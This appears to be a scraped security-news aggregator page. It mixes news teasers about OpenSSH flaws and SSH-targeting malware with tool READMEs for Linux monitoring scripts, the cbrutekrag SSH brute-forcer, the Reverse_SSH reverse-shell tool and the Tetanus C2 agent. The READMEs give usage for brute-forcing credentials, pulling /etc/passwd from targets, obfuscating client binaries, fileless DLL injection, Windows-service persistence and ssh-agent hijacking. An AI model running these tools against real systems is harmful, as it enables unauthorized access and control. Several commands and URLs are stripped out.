Proof-of-concept (PoC) exploit code has been made available for a recently disclosed and patched critical flaw impacting VMware Aria Operations for Networks (formerly vRealize Network Insight). The flaw, tracked asΒ CVE-2023-34039, is rated 9.8 out of a maximum of 10 for severity and has been described as a case of authentication bypass due to a lack of unique cryptographic key generation. β€œA

New OpenSSH Vulnerability Exposes Linux Systems to Remote Command Injection

Details have emerged about a now-patched flaw in OpenSSH that could be potentially exploited to run arbitrary commands remotely on compromised hosts under specific conditions. "This vulnerability allows a remote attacker to potentially execute arbitrary commands on vulnerable OpenSSH's forwarded ssh-agent," Saeed Abbasi, manager of vulnerability research at Qualys,Β saidΒ in an analysis last week.

New Cryptocurrency Mining Campaign Targets Linux Systems and IoT Devices

Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency. "The threat actors behind the attack use a backdoor that deploys a wide array of tools and components such as rootkits and an IRC bot to steal device resources for mining operations," Microsoft threat intelligence researcher Rotem Sde-OrΒ said.

LSMS - Linux Security And Monitoring Scripts

By: Zion3R

These are a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of other scripts. The scripts can be set up to either print out their results, send them to you via mail, or using AlertR as notification channel.

Repository Structure

The scripts are located in the directory scripts/. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.

Each script has a configuration file in the scripts/config/ directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.

The scripts/lib/ directory contains code that is shared between different scripts.

Scripts using a monitor_ prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only result in showing the current state the Linux system and not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the --init argument.


Take a look at the header of the script you want to execute. It contains a short description what this script is supposed to do and what requirements are needed (if any needed at all). If requirements are needed, install them before running the script.

The shared configuration file scripts/config/ contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the scripts/config/ directory. If no configuration file was found, a default setting is used and the results are printed out.

Finally, you can run all configured scripts by executing (which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.


If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:

  1. Set up a notification channel that is supported by the scripts (currently printing out, mail, or AlertR).

  2. Configure the scripts that you want to run using the configuration files in the scripts/config/ directory.

  3. Execute with the --init argument to initialize the scripts with the monitor_ prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.

  4. Set up a cron job as root user that executes (e.g., 0 * * * * root /opt/LSMS/ to start the search hourly).

List of Scripts

Name Script
Monitoring cron files
Monitoring /etc/hosts file
Monitoring /etc/ file
Monitoring /etc/passwd file
Monitoring modules
Monitoring SSH authorized_keys files
Monitoring systemd unit files
Search executables in /dev/shm
Search fileless programs (memfd_create)
Search hidden ELF files
Search immutable files
Search kernel thread impersonations
Search processes that were started by a now disconnected SSH session
Search running deleted programs
Test script to check if alerting works
Verify integrity of installed .deb packages

Legion Malware Upgraded to Target SSH Servers and AWS Credentials

An updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch. "This recent update demonstrates a widening of scope, with new capabilities such the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications,"

Notorious Cyber Gang FIN7 Returns With Cl0p Ransomware in New Wave of Attacks

The notorious cybercrime group known as FIN7 has been observed deployingΒ Cl0pΒ (aka Clop) ransomware, marking the threat actor's first ransomware campaign since late 2021. Microsoft, which detected the activity in April 2023, is tracking the financially motivated actor under its new taxonomyΒ Sangria Tempest. "In these recent attacks, Sangria Tempest uses the PowerShell script POWERTRASH to load

Cbrutekrag - Penetration Tests On SSH Servers Using Brute Force Or Dictionary Attacks. Written In C

By: Zion3R

Penetration tests on SSH servers using dictionary attacks. Written in C.

brute krag means "brute force" in afrikΓ‘ans


This tool is for ethical testing purpose only.
cbrutekrag and its owners can't be held responsible for misuse by users.
Users have to act as permitted by local law rules.



cbrutekrag uses libssh - The SSH Library (



  • make
  • gcc compiler
  • libssh-dev
git clone --depth=1
cd cbrutekrag
make install

Static build


  • cmake
  • gcc compiler
  • make
  • libssl-dev
  • libz-dev
git clone --depth=1
cd cbrutekrag
make install


OpenSSH Brute force tool 0.5.0 __/ | (c) Copyright 2014-2022 Jorge Matricali |___/ usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst] [-t THREADS] [-o OUTPUT.txt] [TARGETS...] -h This help -v Verbose mode -V Verbose mode (sshlib) -s Scan mode -D Dry run -P Progress bar -T <targets> Targets file -C <combinations> Username and password file -t <threads> Max threads -o <output> Output log file -a Accepts non OpenSSH servers -A Allow servers detected as honeypots." dir="auto">
$ cbrutekrag -h
_ _ _
| | | | | |
___ | |__ _ __ _ _| |_ ___| | ___ __ __ _ __ _
/ __|| '_ \| '__| | | | __/ _ \ |/ / '__/ _` |/ _` |
| (__ | |_) | | | |_| | || __/ <| | | (_| | (_| |
\___||_.__/|_| \__,_|\__\___|_|\_\_| \__,_|\__, |
OpenSSH Brute force tool 0.5.0 __/ |
(c) Copyright 2014-2022 Jorge Matricali |___/

usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst]
[-t THREADS] [-o OUTPUT.txt] [TARGETS...]

-h This help
-v Verbose mode
-V Verbose mode (sshlib)
-s Scan mode
-D Dry run
-P Progress bar
-T <targets> Targets file
-C <combinations> Username and password file -t <threads> Max threads
-o <output> Output log file
-a Accepts non OpenSSH servers
-A Allow servers detected as honeypots.

Example usages

cbrutekrag -T targets.txt -C combinations.txt -o result.log
cbrutekrag -s -t 8 -C combinations.txt -o result.log

Supported targets syntax


Combinations file format

root root
root password

New ShellBot DDoS Malware Variants Targeting Poorly Managed Linux Servers

Poorly managed Linux SSH servers are being targeted as part of a new campaign that deploys different variants of a malware called ShellBot. "ShellBot, also known asΒ PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server," AhnLab Security Emergency response Center (ASEC)Β saidΒ in a report. ShellBot is installed on servers that

OpenSSH Releases Patch for New Pre-Auth Double Free Vulnerability

The maintainers of OpenSSH have released OpenSSH 9.2 to address a number of security bugs, including a memory safety vulnerability in the OpenSSH server (sshd). Tracked asΒ CVE-2023-25136, the shortcoming has been classified as a pre-authentication double free vulnerability that was introduced in version 9.1. "This is not believed to be exploitable, and it occurs in the unprivileged pre-auth

OpenSSH fixes double-free memory bug that’s pokable over the network

It's a bug fix for a bug fix. A memory leak was turned into a double-free that has now been turned into correct code...

Reverse_SSH - SSH Based Reverse Shell

Want to use SSH for reverse shells? Now you can.

  • Manage and connect to reverse shells with native SSH syntax
  • Dynamic, local and remote forwarding
  • Native SCP and SFTP implementations for retrieving files from your targets
  • Full windows shell
  • Mutual client & server authentication to create high trust control channels
    And more!
                    +----------------+                 +---------+
| | | |
| | +---------+ RSSH |
| Reverse | | | Client |
| SSH server | | | |
| | | +---------+
+---------+ | | |
| | | | |
| Human | SSH | | SSH | +---------+
| Client +-------->+ <-----------------+ |
| | | | | | RSSH |
+---------+ | | | | Client |
| | | | |
| | | +---------+
| | |
| | |
+----------------+ | +---------+
| | |
| | RSSH |
+---------+ Client |
| |




docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your_external_address>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/" -v data:/data reversessh/reverse_ssh


git clone

cd reverse_ssh

cd bin/

# start the server
cp ~/.ssh/ authorized_keys


# copy client to your target then connect it to the server

# Get help text
ssh -p 3232 help

# See clients
ssh -p 3232 ls -t

| ID | Hostname | IP Address |
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |

# Connect to full shell
ssh -J 0f6ffecb15d75574e5e955e014e0546f6e2851ac

# Or using hostname

ssh -J root.wombo

Setup Instructions

NOTE: reverse_ssh requires Go 1.17 or higher. Please check you have at least this version via go version

The simplest build command is just:


Make will build both the client and server binaries. It will also generate a private key for the client, and copy the corresponding public key to the authorized_controllee_keys file to enable the reverse shell to connect.

Golang allows your to effortlessly cross compile, the following is an example for building windows:

GOOS=windows GOARCH=amd64 make client # will create client.exe

You will need to create an authorized_keys file much like the ssh, this contains your public key. This will allow you to connect to the RSSH server.

Alternatively, you can use the --authorizedkeys flag to point to a file.

cp ~/.ssh/ authorized_keys
./server #Set the server to listen on port 3232

Put the client binary on whatever you want to control, then connect to the server.


You can then see what reverse shells have connected to you using ls:

ssh -p 3232 ls -t
| ID | Hostname | IP Address |
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |

Then typical ssh commands work, just specify your rssh server as a jump host.

# Connect to full shell
ssh -J root.wombo

# Run a command without pty
ssh -J root.wombo help

# Start remote forward
ssh -R 1234:localhost:1234 -J root.wombo

# Start dynamic forward
ssh -D 9050 -J root.wombo

scp -J root.wombo:/etc/passwd .

sftp -J root.wombo:/etc/passwd .

Fancy Features

Default Server

Specify a default server at build time:

$ make

# Will connect to, even though no destination is specified
$ bin/client

# Behaviour is otherwise normal; will connect to the supplied host, e.g
$ bin/client

Built in Web Server

The RSSH server can also run an HTTP server on the same port as the RSSH server listener which serves client binaries. The server must be placed in the project bin/ folder, as it needs to find the client source.

fingerprint will default to server public key --upx Use upx to compress the final binary (requires upx to be installed) --garble Use garble to obfuscate the binary (requires garble to be installed) # Build a client binary catcher$ link --name test " dir="auto">
./server --webserver :3232

# Generate an unnamed link
ssh -p 3232

catcher$ link -h

link [OPTIONS]
Link will compile a client and serve the resulting binary on a link which is returned.
This requires the web server component has been enabled.
-t Set number of minutes link exists for (default is one time use)
-s Set homeserver address, defaults to server --external_address if set, or server listen address if not.
-l List currently active download links
-r Remove download link
--goos Set the target build operating system (default to runtime GOOS)
--goarch Set the target build architecture (default to runtime GOARCH)
--name Set link name
--shared-object Generate shared object file
--fingerprint Set RSSH server fingerprint will default to server public key
--upx Use upx to compress the final binary (requires upx to be installed)
--garble Use ga rble to obfuscate the binary (requires garble to be installed)

# Build a client binary
catcher$ link --name test

Then you can download it as follows:

chmod +x test

Windows DLL Generation

You can compile the client as a DLL to be loaded with something like Invoke-ReflectivePEInjection. This will need a cross compiler if you are doing this on linux, use mingw-w64-gcc.

CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER= make client_dll

When the RSSH server has the webserver enabled you can also compile it with the link command:

./server --webserver :3232

# Generate an unnamed link
ssh -p 3232

catcher$ link --name windows_dll --shared-object --goos windows

Which is useful when you want to do fileless injection of the rssh client.

SSH Subsystem

The SSH ecosystem allowsy out define and call subsystems with the -s flag. In RSSH this is repurposed to provide special commands for platforms.


list Lists avaiable subsystem
sftp: Runs the sftp handler to transfer files


setgid: Attempt to change group
setuid: Attempt to change user


service: Installs or removes the rssh binary as a windows service, requires administrative rights


# Install the rssh binary as a service (windows only)
ssh -J test-pc.user.test-pc -s service --install

Windows Service Integration

The client RSSH binary supports being run within a windows service and wont time out after 10 seconds. This is great for creating persistent management services.

Full Windows Shell Support

Most reverse shells for windows struggle to generate a shell environment that supports resizing, copying and pasting and all the other features that we're all very fond of. This project uses conpty on newer versions of windows, and the winpty library (which self unpacks) on older versions. This should mean that almost all versions of windows will net you a nice shell.


The RSSH server can send out raw HTTP requests set using the webhook command from the terminal interface.

First enable a webhook:

$ ssh -p 3232
catcher$ webhook --on http://localhost:8080/

Then disconnect, or connect a client, this will when issue a POST request with the following format.

$ nc -l -p 8080
POST /rssh_webhook HTTP/1.1
Host: localhost:8080
User-Agent: Go-http-client/1.1
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip



RSSH and SSH support creating tuntap interfaces that allow you to route traffic and create pseudo-VPN. It does take a bit more setup than just a local or remote forward (-L, -R), but in this mode you can send UDP and ICMP.

First set up a tun (layer 3) device on your local machine.

sudo ip tuntap add dev tun0 mode tun
sudo ip addr add dev tun0
sudo ip link set dev tun0 up

# This will defaultly route all non-local network traffic through the tunnel
sudo ip route add via dev tun0

Install a client on a remote machine, this will not work if you have your RSSH client on the same host as your tun device.

ssh -J user.wombo -w 0:any

This has some limitations, it is only able to send UDP/TCP/ICMP, and not arbitrary layer 3 protocols. ICMP is best effort and may use the remote hosts ping tool, as ICMP sockets are privileged on most machines. This also does not support tap devices, e.g layer 2 VPN, as this would require administrative access.



To enable the --garble flag in the link command you must install garble, a system for obfuscating golang binaries. However the @latest release has a bug that causes panics with generic code.
If you are installing this manually use the following:

go install

Then make sure that the go/bin/ directory is in your $PATH

Permission denied (publickey).

Unfortunately the golang crypto/ssh upstream library does not support rsa-sha2-* algorithms, and work is currently ongoing here:


So until that work is completed, you will have to generate a different (non-rsa) key. I recommend the following:

ssh-keygen -t ed25519

Windows and SFTP

Due to the limitations of SFTP (or rather the library Im using for it). Paths need a little more effort on windows.

sftp -r -J test-pc.user.test-pc:'/C:/Windows/system32'

Note the / before the starting character.

Foreground vs Background (Important note about clients)

By default, clients will run in the background. When started they will execute a new background instance (thus forking a new child process) and then the parent process will exit. If the fork is successful the message "Ending parent" will be printed.

This has one important ramification: once in the background a client will not show any output, including connection failure messages. If you need to debug your client, use the --foreground flag.

North Korean Hackers Spreading Trojanized Versions of PuTTY Client Application

A threat with a North Korea nexus has been found leveraging a "novel spear phish methodology" that involves making use of trojanized versions of the PuTTY SSH and Telnet client. Google-owned threat intelligence firm Mandiant attributed the new campaign to an emerging threat cluster it tracks under the nameΒ UNC4034. "UNC4034 established communication with the victim over WhatsApp and lured them

System Informer - A Free, Powerful, Multi-Purpose Tool That Helps You Monitor System Resources, Debug Software And Detect Malware

System Informer

A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware. Brought to you by Winsider Seminars & Solutions, Inc.

Project Website - Project Downloads

System requirements

Windows 7 or higher, 32-bit or 64-bit.


  • A detailed overview of system activity with highlighting.
  • Graphs and statistics allow you quickly to track down resource hogs and runaway processes.
  • Can't edit or delete a file? Discover which processes are using that file.
  • See what programs have active network connections, and close them if necessary.
  • Get real-time information on disk access.
  • View detailed stack traces with kernel-mode, WOW64 and .NET support.
  • Go beyond services.msc: create, edit and control services.
  • Small, portable and no installation required.
  • 100% Free Software (MIT)

Building the project

Requires Visual Studio (2022 or later).

Execute build_release.cmd located in the build directory to compile the project or load the SystemInformer.sln and Plugins.sln solutions if you prefer building the project using Visual Studio.

You can download the free Visual Studio Community Edition to build the System Informer source code.

See the build readme for more information or if you're having trouble building.


Please use the GitHub issue tracker for reporting problems or suggesting new features.


If you are running System Informer from a USB drive, you may want to save System Informer's settings there as well. To do this, create a blank file named "SystemInformer.exe.settings.xml" in the same directory as SystemInformer.exe. You can do this using Windows Explorer:

  1. Make sure "Hide extensions for known file types" is unticked in Tools > Folder options > View.
  2. Right-click in the folder and choose New > Text Document.
  3. Rename the file to SystemInformer.exe.settings.xml (delete the ".txt" extension).


Plugins can be configured from Options > Plugins.

If you experience any crashes involving plugins, make sure they are up to date.

Disk and Network information provided by the ExtendedTools plugin is only available when running System Informer with administrative rights.

New IoT RapperBot Malware Targeting Linux Servers via SSH Brute-Forcing Attack

A new IoT botnet malware dubbed RapperBot has been observed rapidly evolving its capabilities since it was first discovered in mid-June 2022. "This family borrows heavily from the originalΒ Mirai source code, but what separates it from other IoT malware families is its built-in capability to brute force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai,"

New Linux Malware Framework Lets Attackers Install Rootkit on Targeted Systems

A never-before-seen Linux malware has been dubbed a "Swiss Army Knife" for its modular architecture and its capability to install rootkits. This previously undetected Linux threat, calledΒ Lightning FrameworkΒ by Intezer, is equipped with a plethora of features, making it one of the most intricate frameworks developed for targeting Linux systems. "The framework has both passive and active

Tetanus - Mythic C2 Agent Targeting Linux And Windows Hosts Written In Rust

Tetanus is a Windows and Linux C2 agent written in rust.


To install Tetanus, you will need Mythic set up on a machine.

In the Mythic root directory, use mythic-cli to install the agent.

payload start tetanus">
sudo ./mythic-cli install github
sudo ./mythic-cli payload start tetanus

Tetanus supports the http C2 profile:

sudo ./mythic-cli install github
sudo ./mythic-cli c2 start http


  • Background job management
  • Built-in ssh client
    • Connect to a machine and download/upload files between that machine and Mythic
    • Get directory listings from machines using sftp
    • Spawn agents on machines using ssh
    • ssh-agent hijacking
  • Streaming portscan
  • Stand up TCP redirectors

Future Additions

  • v0.2.0
    • Socks proxying
    • Windows token manipulation
    • More browser script integration
    • DNS C2 profile
    • p2p capabilities
    • In memory shellcode execution execute-shellcode

General Commands

Command Syntax Description
cat cat [file] Output the contents of a file.
cd cd [new directory] Change directory.
cp cp [source] [destination] Copy a file from [source] to [destination].
download download [path] Download a file from the target system (supports relative paths).
exit exit Exit the agent.
getenv getenv Get the current environment variables.
getprivs getprivs Get the privileges of the agent session.
jobkill jobkill [job id] Shutdown a running background job.
jobs jobs List currently running background jobs.
ls ls [directory] List files or directories (supports relative paths).
mkdir mkdir [directory] Make a new directory.
mv mv [source] [destination] Move a file from [source] to [destination] (supports relative paths).
portscan portscan [popup] Scan a list of IPs for open ports.
ps ps Get a list of currently running processes.
pwd pwd Print working directory.
redirect redirect [<bindhost>:<bindport>:<connecthost>:<connectport>] Setup a TCP redirector on the remote system.
rm rm [path] Remove a file or directory (supports relative paths).
setenv setenv [name] [value] Set environment variable [name] to [value].
shell shell [command] Run a shell command with bash -c on Linux or cmd.exe /c on Windows in a new thread.
sleep sleep [interval][units] [jitter] Set the sleep interval and jitter (supports unit suffixing).
ssh ssh [popup] Use ssh to execute commands, download/upload files or grab directory listings.
ssh-agent ssh-agent [-c <socket>] [-d] [-l] Connect to running ssh agent sockets on the host or list identities.
ssh-spawn ssh-spawn [popup] Spawn a Mythic agent on a remote host using ssh.
unsetenv unsetenv [var] Unset an environment variable.
upload upload [popup] Upload a file to the host machine.

Windows-specific Commands

Command Syntax Description
powershell powershell [command] Run a command using powershell.exe /c in a new thread.

OpenSSH goes Post-Quantum, switches to qubit-busting crypto by default

Useful quantum computers might not actually be possible. But what if they are? And what if they arrive, say, tomorrow?

